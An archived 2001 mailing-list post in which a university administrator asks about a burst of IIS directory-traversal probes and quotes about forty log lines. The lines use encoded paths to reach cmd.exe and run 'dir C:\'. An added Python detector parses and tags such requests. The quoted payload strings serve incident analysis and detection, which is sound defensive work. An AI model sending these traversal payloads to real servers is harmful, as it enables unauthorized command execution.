New IIS exploit tool? Has anyone seen this pattern before?

From: Thomas Haeberlen (Haeberlenat_private-Stuttgart.DE)
Date: Tue Oct 30 2001 - 03:47:00 PST

  • Next message: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"

    Hello everybody,
    
    has anyone seen this pattern of IIS attacks before? Could this be a new
    exploit tool or something like "nimda2"? On the other hand, it seems that 
    it is only trying the long-known holes...
    
    ------------------------------- snip ----------------------------------
    
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-"
    ------------------------------------ snap --------------------------------
    
    Timestamps are GMT+1. Any hints?
    
    Regards,
    
    Thomas Haeberlen
    
    -- 
    Thomas Haeberlen
    Rechenzentrum Universitaet Stuttgart (RUS)              
    Abteilung Informationsdienste  
    Allmandring 30 , D-70569 Stuttgart
    Email: haeberlenat_private-stuttgart.de
    Phone: +49 711 685 47 19 Fax: +49 711 678 76 26
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
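The requests quoted above are all variants of one thing: a traversal out of an executable virtual directory (/scripts, /msadc, /_vti_bin, /PBServer, /Rpc, ...) to winnt/system32/cmd.exe, tried with plain double encoding (%255c, %25%35%63), the malformed %%35c form (which IIS answered with 400), and the overlong UTF-8 forms %C0%AF, %C1%1C and %C1%9C that an unpatched IIS 4/5 decoded to / and \. The script below is an added example and is not part of the original post or of any tool mentioned in it. It parses combined-format access log lines, normalizes each path the way a lenient IIS decoder would (two rounds of percent-decoding plus the 2-byte overlong UTF-8 mapping), and tags each request so the 400s and 404s from one source can be read as a single scan. The log lines in SAMPLE_LOG are constructed after the ones in the post; the tag names, helper names and the Python 3.9+ type hints are my own choices.

```python
import re
from collections import Counter

# Constructed sample, modelled on the requests quoted in the post (not a verbatim copy).
SAMPLE_LOG = r"""
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
10.0.0.5 - - [30/Oct/2001:11:44:02 +0100] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Apache/IIS "combined" style line: ip ident user [ts] "METHOD uri HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[0-9.]+" '
    r'(?P<status>\d{3}) \S+'
)
HEXDIGITS = b"0123456789abcdefABCDEF"
SHELL_TARGETS = ("cmd.exe", "root.exe")  # root.exe: the cmd.exe copy left behind by Code Red II
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}")


def percent_decode(data: bytes) -> bytes:
    """One pass of %XX decoding. A '%' not followed by two hex digits (the '%%35c' form
    in the post) is kept literally, so a second pass turns the remaining '%5c' into '\\'."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        hx = data[i + 1:i + 3]
        if data[i] == 0x25 and len(hx) == 2 and all(c in HEXDIGITS for c in hx):
            out.append(int(hx.decode("ascii"), 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def iis_utf8_decode(data: bytes) -> bytes:
    """Mimic the lenient UTF-8 decoding of unpatched IIS 4/5 (MS00-078): a lead byte
    0xC0-0xDF and the byte after it are combined with the 2-byte formula without any
    overlong/continuation check, so C0 AF -> '/', C1 9C and C1 1C -> '\\'.
    Only results that land in ASCII are substituted; everything else is passed through."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < n:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:
                out.append(cp)
                i += 2
                continue
        out.append(b)
        i += 1
    return bytes(out)


def normalize(uri: str, passes: int = 2) -> str:
    """Path as a lenient IIS would see it: `passes` rounds of percent + overlong decoding
    (two rounds cover the MS01-026 double-decode bug), '\\' folded to '/', lower-cased.
    The query string (the '/c+dir+C:\\' argument) is dropped."""
    path = uri.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(passes):
        path = iis_utf8_decode(percent_decode(path))
    return path.decode("latin-1").replace("\\", "/").lower()


def classify(uri: str) -> list[str]:
    """Tags describing why a request looks like an IIS traversal / command-execution probe."""
    tags = []
    norm = normalize(uri)
    if TRAVERSAL_RE.search(norm):
        tags.append("traversal")
    if any(t in norm for t in SHELL_TARGETS):
        tags.append("shell-exec")
    if OVERLONG_RE.search(uri.lower()):
        tags.append("overlong-utf8")
    if normalize(uri, passes=1) != norm:  # only a second decoding round exposes the '..'
        tags.append("double-encoding")
    return tags


def scan(log_text: str) -> list[dict]:
    """Parse log lines and return the suspicious ones with tags. The status code is kept:
    404/400 means the probe missed, a 200 would mean 'dir C:\\' actually ran."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["uri"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "path": normalize(m["uri"]), "tags": tags})
    return hits


def summarize(hits: list[dict]) -> dict:
    """Per source IP: number of flagged requests and how often each tag was seen."""
    by_ip: dict = {}
    for h in hits:
        entry = by_ip.setdefault(h["ip"], {"requests": 0, "tags": Counter()})
        entry["requests"] += 1
        entry["tags"].update(h["tags"])
    return by_ip


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["ip"], h["status"], h["path"], ",".join(h["tags"]))
    for ip, s in summarize(found).items():
        print(f"{ip}: {s['requests']} flagged requests, tags={dict(s['tags'])}")
```

Run it against a real access log with `scan(open("access.log").read())`. The two things worth checking on a live server are the status column (anything but 400/403/404 on a tagged line needs a look) and the time spread per IP: dozens of encoding variants from one address within a few seconds, as in the post, is what a scanner looks like, whereas a worm typically shows up from many addresses.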
    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:23:36 PST